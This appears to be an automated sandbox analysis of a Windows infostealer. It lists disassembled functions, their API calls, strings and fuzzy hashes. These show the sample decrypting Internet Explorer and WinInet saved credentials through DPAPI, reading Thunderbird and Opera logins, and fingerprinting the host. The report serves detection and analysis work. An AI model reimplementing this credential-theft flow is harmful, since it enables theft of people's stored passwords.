                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000), ref: 00427763
                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00427776
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,?,?,00000000,?,00000000), ref: 00427799
                                                                                                                                                    • wsprintfW.USER32 ref: 004277D5
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 004277E3
                                                                                                                                                    • wsprintfW.USER32 ref: 00427803
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00427811
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 0042781A
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 00427825
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0042786C
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,`zB,00000000,00000000,00000001,?), ref: 0042788F
                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004278C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
                                                                                                                                                    • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2$`zB
                                                                                                                                                    • API String ID: 1004607082-3710974154
                                                                                                                                                    • Opcode ID: 39f539babfc661617727b97e6813a2099967da98d924708bd6f9ebc3e81fe33f
                                                                                                                                                    • Instruction ID: 65ee4204310f67eaed5b335dadab237e947fadae9ba52e4cd0b7d7de588e0511
                                                                                                                                                    • Opcode Fuzzy Hash: 39f539babfc661617727b97e6813a2099967da98d924708bd6f9ebc3e81fe33f
                                                                                                                                                    • Instruction Fuzzy Hash: 2E512E71E00219AFDB119BA4DC49FEF7BBCEF44740F14402AE611E2251EB789A44CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004362A1, Relevance: 29.2, APIs: 13, Strings: 3, Instructions: 1202COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 004362A6
                                                                                                                                                      • Part of subcall function 00435E43: __EH_prolog.LIBCMT ref: 00435E48
                                                                                                                                                      • Part of subcall function 00435E43: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?,?,?,00000000), ref: 00435EE8
                                                                                                                                                      • Part of subcall function 00435E43: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?,00000000), ref: 00435F36
                                                                                                                                                      • Part of subcall function 00435E43: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00435F3F
                                                                                                                                                      • Part of subcall function 0045084A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00436357,00000000,?,?,?,?,?,?,?), ref: 0045085D
                                                                                                                                                      • Part of subcall function 0045084A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045088E
                                                                                                                                                    • _strftime.LIBCMT ref: 004363D5
                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(00001001,?,00000100,?,?,?,?,?), ref: 004363FD
                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000), ref: 00436404
                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00436652
                                                                                                                                                      • Part of subcall function 00413FB7: __EH_prolog.LIBCMT ref: 00413FBC
                                                                                                                                                      • Part of subcall function 0043755D: GetSystemPowerStatus.KERNEL32 ref: 00437567
                                                                                                                                                    • GetComputerNameA.KERNEL32(?,00000101), ref: 00436D0D
                                                                                                                                                    • GetUserNameA.ADVAPI32(00000001,00000101), ref: 00436D82
                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000012,00000040,00000001), ref: 004370AF
                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,00000000,00000012,00000040,00000001), ref: 004371A2
                                                                                                                                                    • GetSystemMetrics.USER32 ref: 0043733B
                                                                                                                                                    • GetSystemMetrics.USER32 ref: 0043736A
                                                                                                                                                    • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 004373F9
                                                                                                                                                    • EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 00437455
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: System$H_prologNameUser$DevicesDisplayEnumInfoMetricsStatusTime$CloseComputerDefaultFileGlobalLocaleMemoryOpenPowerQueryUnothrow_t@std@@@Value__ehfuncinfo$??2@_strftime
                                                                                                                                                    • String ID: =$@$Sun Nov 7 15:28:54 2021
                                                                                                                                                    • API String ID: 2192795662-4223796367
                                                                                                                                                    • Opcode ID: c465581000549528dafec9fbfd534eef45168a423db945c529bd5e23462f90bd
                                                                                                                                                    • Instruction ID: a18152419cf2b0f9256a73950b0b27119c01ed0e9ede2d80e4bd8081987319b7
                                                                                                                                                    • Opcode Fuzzy Hash: c465581000549528dafec9fbfd534eef45168a423db945c529bd5e23462f90bd
                                                                                                                                                    • Instruction Fuzzy Hash: 9CB2E370D042A88BDB25DB74C8547EDBBB1AF55304F0491EED489AB242DB780FC9CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041DD0B, Relevance: 23.1, APIs: 15, Instructions: 606libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041DD10
                                                                                                                                                      • Part of subcall function 00434690: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 004346DC
                                                                                                                                                      • Part of subcall function 004341EF: __EH_prolog.LIBCMT ref: 004341F4
                                                                                                                                                      • Part of subcall function 004341EF: _strcat.LIBCMT ref: 0043424F
                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000), ref: 0041DEE4
                                                                                                                                                      • Part of subcall function 0041DB96: __EH_prolog.LIBCMT ref: 0041DB9B
                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000,?,00000000,00000000), ref: 0041E1CE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E21C
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E25B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E297
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,F2F2EF5E), ref: 0041E2D9
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E30D
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E33B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E37A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E3AC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E3EB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E420
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E451
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E493
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable_strcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1501777685-0
                                                                                                                                                    • Opcode ID: 20323f825a5d6d2f5cd7d1cc6405b8f6c449b30acdc75989df9eba3e4f583f0d
                                                                                                                                                    • Instruction ID: 953ed15c53e25eee94446925cd98e0e2dfeeb8ba9b8ddfed4577fe1056b87580
                                                                                                                                                    • Opcode Fuzzy Hash: 20323f825a5d6d2f5cd7d1cc6405b8f6c449b30acdc75989df9eba3e4f583f0d
                                                                                                                                                    • Instruction Fuzzy Hash: 08323474E01248CBDF05DFA9D8502EEBBB4EF59304F11483FD802A7252D7785A8ACB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041E6DA, Relevance: 22.4, APIs: 7, Strings: 5, Instructions: 1350COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041E6DF
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 0041E714
                                                                                                                                                      • Part of subcall function 004341EF: __EH_prolog.LIBCMT ref: 004341F4
                                                                                                                                                      • Part of subcall function 004341EF: _strcat.LIBCMT ref: 0043424F
                                                                                                                                                      • Part of subcall function 0040BE6B: __EH_prolog.LIBCMT ref: 0040BE70
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                    • NSS_Init.NSS3(?,?,?,?,?,?), ref: 0041E876
                                                                                                                                                    • NSS_Shutdown.NSS3(?,?,?,?,?,?,?), ref: 0041FC18
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    • sqlite3_finalize.NSS3(?), ref: 0041EEDE
                                                                                                                                                    • sqlite3_close.NSS3(?), ref: 0041EEEB
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 0041F0F6
                                                                                                                                                      • Part of subcall function 00424913: __EH_prolog.LIBCMT ref: 00424918
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$Deallocate$FolderInitPathShutdown__fread_nolock_strcatsqlite3_closesqlite3_finalize
                                                                                                                                                    • String ID: %$(~G$Profiles$ThunderBird$logins
                                                                                                                                                    • API String ID: 1928370683-1350493469
                                                                                                                                                    • Opcode ID: 329d11370ac47ac38dfa1eb114a6f6b473bd565500040e3802421d071ecce60d
                                                                                                                                                    • Instruction ID: 6452d5013f129428398a863283e2e4babe2ddfd9ab5d0ef953be96a2b19ff06a
                                                                                                                                                    • Opcode Fuzzy Hash: 329d11370ac47ac38dfa1eb114a6f6b473bd565500040e3802421d071ecce60d
                                                                                                                                                    • Instruction Fuzzy Hash: 1BD29570D042688BDB25DF68C890AEDBBB1AF59304F1441EED849A3252DB385FC9CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043CD97, Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 469COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: /$UT$in-gdi-devcaps-l1-1-0
                                                                                                                                                    • API String ID: 0-3985708853
                                                                                                                                                    • Opcode ID: f108283faa6215dd8d29d311679e4cc8e73af9c9ee808ca5a2009c0537096791
                                                                                                                                                    • Instruction ID: f2e9c931e196301f5c6d4f2fa709dcbd5df890ec77e86307b4e8c82e241acbaa
                                                                                                                                                    • Opcode Fuzzy Hash: f108283faa6215dd8d29d311679e4cc8e73af9c9ee808ca5a2009c0537096791
                                                                                                                                                    • Instruction Fuzzy Hash: 6102AD71A083819FD724DF29D4807ABB7E4AF99308F14182EF88593341D738D859CB9B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415816, Relevance: 19.2, APIs: 2, Strings: 8, Instructions: 1695COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041581B
                                                                                                                                                    • GetDriveTypeA.KERNEL32(?,?,?,00000000,00000001,00486150,?,00000001,00477B1B,00477B1B), ref: 00415A81
                                                                                                                                                      • Part of subcall function 00437787: __EH_prolog.LIBCMT ref: 0043778C
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeallocateH_prolog$DriveType
                                                                                                                                                    • String ID: $-$0sU$3UZ_V@o$@&),$K$Xv463$rdK
                                                                                                                                                    • API String ID: 1122742828-2565485207
                                                                                                                                                    • Opcode ID: e9a926ceb1027b15118c13112578516821caf7643531cee404cd88370ebc606f
                                                                                                                                                    • Instruction ID: 6aefb65386abc1d3a2233f2bd3c5fbaf9caeabf8f0194f03ca1dbfb50e5d2876
                                                                                                                                                    • Opcode Fuzzy Hash: e9a926ceb1027b15118c13112578516821caf7643531cee404cd88370ebc606f
                                                                                                                                                    • Instruction Fuzzy Hash: 10E2CF30900258CBDF24DF65C991BEDB7B1AF55304F6081AEE44A77282DB385F89CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410AD2, Relevance: 18.1, APIs: 4, Strings: 6, Instructions: 615libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00410AD7
                                                                                                                                                      • Part of subcall function 004122F1: __EH_prolog.LIBCMT ref: 004122F6
                                                                                                                                                      • Part of subcall function 00434690: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 004346DC
                                                                                                                                                      • Part of subcall function 004341EF: __EH_prolog.LIBCMT ref: 004341F4
                                                                                                                                                      • Part of subcall function 004341EF: _strcat.LIBCMT ref: 0043424F
                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 00410B2B
                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                      • Part of subcall function 0040CD55: __EH_prolog.LIBCMT ref: 0040CD5A
                                                                                                                                                      • Part of subcall function 0040CD55: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CE6D
                                                                                                                                                      • Part of subcall function 0040CD55: HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CE74
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004112BF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcat
                                                                                                                                                    • String ID: (`A[\GZQ$Opera$WS$aj=9$bydo$g
                                                                                                                                                    • API String ID: 1239964785-2711707265
                                                                                                                                                    • Opcode ID: c10b293d2a37cf59628c5abd582bfdabc4d1ace40bb993585c01d4cb86d8fd1c
                                                                                                                                                    • Instruction ID: 47efab72177238883afc255c5763ee4fece8d8c636d340e43540bacac095a25c
                                                                                                                                                    • Opcode Fuzzy Hash: c10b293d2a37cf59628c5abd582bfdabc4d1ace40bb993585c01d4cb86d8fd1c
                                                                                                                                                    • Instruction Fuzzy Hash: 2532B070D00218DFDF14DFA9C945BEEBBB5AF49304F1080AED405BB251EB789A89CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004278E1, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97stringencryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00427907
                                                                                                                                                    • lstrlenW.KERNEL32(00000002), ref: 00427918
                                                                                                                                                    • CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 00427941
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 00427987
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 004279B1
                                                                                                                                                    • CredFree.ADVAPI32(?), ref: 004279CA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
                                                                                                                                                    • String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
                                                                                                                                                    • API String ID: 186292201-3120203912
                                                                                                                                                    • Opcode ID: cfd6fa37ac79a2c36573d475ce08642f07beee5bfbfdb3561e8ac6dfc452ef9c
                                                                                                                                                    • Instruction ID: 315d7824b14dd043ff4c3680f06d8dc4a962a7a2674b82f28e2a42a1237975e4
                                                                                                                                                    • Opcode Fuzzy Hash: cfd6fa37ac79a2c36573d475ce08642f07beee5bfbfdb3561e8ac6dfc452ef9c
                                                                                                                                                    • Instruction Fuzzy Hash: 91313AB5E00219ABDF20DF95DC44EEFBBB8FB84740F50416AE911E3240E7759A41CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041D364, Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 404timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0041C62D: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041C81C,00000002,?,00000000,00000244,?,?,0041C94F,?,00000000,00000244), ref: 0041C660
                                                                                                                                                    • _strcat.LIBCMT ref: 0041D4D7
                                                                                                                                                    • _strcat.LIBCMT ref: 0041D552
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 0041D6A7
                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041D6C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileTime$_strcat$LocalPointerSystem
                                                                                                                                                    • String ID: /../$/..\$\../$\..\
                                                                                                                                                    • API String ID: 3418985325-3885502717
                                                                                                                                                    • Opcode ID: 2418708c0f4a7a327164f97c55b223f90dd42a750258f0b90b3772b3387738c1
                                                                                                                                                    • Instruction ID: eb6036b59496e4e6fbe181b4b5ce342400823b757d4c6e63c030e7b40a2293de
                                                                                                                                                    • Opcode Fuzzy Hash: 2418708c0f4a7a327164f97c55b223f90dd42a750258f0b90b3772b3387738c1
                                                                                                                                                    • Instruction Fuzzy Hash: 31E1C2B19087419FC315CF29C4816EBBBE1AF89314F14892FE4A9C7341D739E985CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004333DD, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 71libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00433D8A,00000001,?,?,?,00433EC3), ref: 0043341C
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00433457
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00433D8A,00000001,?,?,?,00433EC3), ref: 0043348B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: %uVQ$+>1<$:$JW@F
                                                                                                                                                    • API String ID: 145871493-3297096886
                                                                                                                                                    • Opcode ID: 587b2d3b25d932c32257f49fc22e427aecd4b6780ebf2d704c8753bf6f6cf678
                                                                                                                                                    • Instruction ID: af43abeba9bd3fe54aaef868cd09188f0138307d9c5ba4e8e48f4a9e4419e904
                                                                                                                                                    • Opcode Fuzzy Hash: 587b2d3b25d932c32257f49fc22e427aecd4b6780ebf2d704c8753bf6f6cf678
                                                                                                                                                    • Instruction Fuzzy Hash: 27212930904259AB9B02DFA898904EFFBB9EF2D345B0041ADD801A7201DB758F46C765
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00435C73, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00435C78
                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,755524D0,00000000), ref: 00435C95
                                                                                                                                                      • Part of subcall function 004130D3: __EH_prolog.LIBCMT ref: 004130D8
                                                                                                                                                      • Part of subcall function 00413756: __EH_prolog.LIBCMT ref: 0041375B
                                                                                                                                                      • Part of subcall function 00413756: std::locale::_Init.LIBCPMT ref: 00413779
                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00435DE7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
                                                                                                                                                    • String ID: <~G$v,A
                                                                                                                                                    • API String ID: 3259846166-1855114899
                                                                                                                                                    • Opcode ID: c06afdf9614241d688165a3f2d7cb63325e663b3575067058055abec4ff03d82
                                                                                                                                                    • Instruction ID: 2e03a841babc3bec68d1f3060c50f468c86cca3ab336f9e0169bfd74fd899f9c
                                                                                                                                                    • Opcode Fuzzy Hash: c06afdf9614241d688165a3f2d7cb63325e663b3575067058055abec4ff03d82
                                                                                                                                                    • Instruction Fuzzy Hash: 36418BB0D04318CBCB11DFA9C8487EEBBB5AF48304F1081AED409B7251EB785A89CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004279D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoCreateInstance.OLE32(0046BCB0,00000000,00000015,0046BCD0,?), ref: 004279F5
                                                                                                                                                    • StrStrIW.SHLWAPI(?,0047AC5C), ref: 00427A46
                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00427A64
                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00427A72
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeTask$CreateInstance
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 2903366249-3887548279
                                                                                                                                                    • Opcode ID: 754d09b705d08f49b927f7055c8e2a8c8186cb560866d5aed00bb76c1fc44fa4
                                                                                                                                                    • Instruction ID: e06bcc15f1a1838a6940c051a4201ead8a51dc1f4cdbd2fdf25301b0df36a1f0
                                                                                                                                                    • Opcode Fuzzy Hash: 754d09b705d08f49b927f7055c8e2a8c8186cb560866d5aed00bb76c1fc44fa4
                                                                                                                                                    • Instruction Fuzzy Hash: 1E213C74B04219EFCB04DFA9E884DAEB7B9EF88714B50806AF405E7250DB749E40CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041AD32, Relevance: 8.3, Strings: 6, Instructions: 787COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • incomplete dynamic bit lengths tree, xrefs: 0041B191
                                                                                                                                                    • oversubscribed dynamic bit lengths tree, xrefs: 0041B17A
                                                                                                                                                    • invalid stored block lengths, xrefs: 0041B4DB
                                                                                                                                                    • invalid bit length repeat, xrefs: 0041B554
                                                                                                                                                    • too many length or distance symbols, xrefs: 0041B4EC
                                                                                                                                                    • invalid block type, xrefs: 0041ADEE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: incomplete dynamic bit lengths tree$invalid bit length repeat$invalid block type$invalid stored block lengths$oversubscribed dynamic bit lengths tree$too many length or distance symbols
                                                                                                                                                    • API String ID: 0-2424009833
                                                                                                                                                    • Opcode ID: b269da6643c69e098ecedbbffa5b11a5e1aaf683326cda36e2ddc033e61c8a28
                                                                                                                                                    • Instruction ID: ea6e4783b05cf866cf2da8c6cf78328fcbe76a936166075f511249c49bd9750b
                                                                                                                                                    • Opcode Fuzzy Hash: b269da6643c69e098ecedbbffa5b11a5e1aaf683326cda36e2ddc033e61c8a28
                                                                                                                                                    • Instruction Fuzzy Hash: 2462D6B1A00209DFCF14CFA9C9916ADBBF1FB48310F24815AE819EB345D7389A91DF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043DA90, Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindClose.KERNEL32(000000FF,?,00414A08,?,7FFFFFFF,?,00000000,00000000,?,?,?,004139D8,00000000,00000000,00000000,?), ref: 0043DA9C
                                                                                                                                                    • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00414A08,?,7FFFFFFF,?,00000000,00000000), ref: 0043DACC
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00414A08,?,7FFFFFFF,?,00000000,00000000,?,?,?,004139D8,00000000,00000000), ref: 0043DAD9
                                                                                                                                                    • FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00414A08,?,7FFFFFFF,?,00000000,00000000), ref: 0043DAF3
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00414A08,?,7FFFFFFF,?,00000000,00000000,?,?,?,004139D8,00000000,00000000), ref: 0043DB00
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$ErrorFileFirstLast$Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 569926201-0
                                                                                                                                                    • Opcode ID: ad8dba18d0c7c5d844170bccbd13957ed4c5dbdb0cf10158bbb3707e4768dbbd
                                                                                                                                                    • Instruction ID: 7d6fefd4c16f4c2e4a88589e015a5f3986d8b025b466eeef22b90992bcd3f6d6
                                                                                                                                                    • Opcode Fuzzy Hash: ad8dba18d0c7c5d844170bccbd13957ed4c5dbdb0cf10158bbb3707e4768dbbd
                                                                                                                                                    • Instruction Fuzzy Hash: 70019E31404149BBCB206F66ED0CC5F7FA9EFDA761F100A2AF565C11A0D7319890DAA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041C217, Relevance: 6.5, Strings: 5, Instructions: 277COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
                                                                                                                                                    • API String ID: 0-2151277842
                                                                                                                                                    • Opcode ID: c4b4fe4a70f4dc59050e505b2f8b4ab6900bbe7a42c48d05927e6a911eb00426
                                                                                                                                                    • Instruction ID: f00d81018bc45cb491139323543e81c8ea405c227acfa98491f455fe85471aa3
